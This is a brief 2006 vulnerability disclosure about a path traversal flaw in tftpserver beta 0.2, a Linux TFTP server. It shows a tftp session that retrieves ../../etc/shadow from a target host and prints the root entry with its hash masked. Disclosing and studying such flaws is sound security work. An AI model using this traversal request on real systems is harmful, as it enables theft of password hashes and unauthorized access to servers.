======tftpserver dot dot vulnerability====== //3/24/2006//

http://sourceforge.net/projects/tftp-server/

From the README:

"This server is a Multithreaded TFTP Server based on Trivial File Transfer Protocol and is normally used for PXE Boot or other Network Boots. It supports advance options like tsize, blksize and interval.

This is second beta Linux Release 0.2"

tftpserver beta 0.2 is vulnerable to the ../ bug because it does not sanitize user input.

root@pangea:/home/done/tftpserver# tftp 192.168.0.26

tftp> get ../../etc/shadow

Received 652 bytes in 0.0 seconds

tftp> quit

root@debian:/home/done/tftpserver# head shadow

root:$1XXXXXXXXXXXXXXXXXXX:13046:0:99999:7:::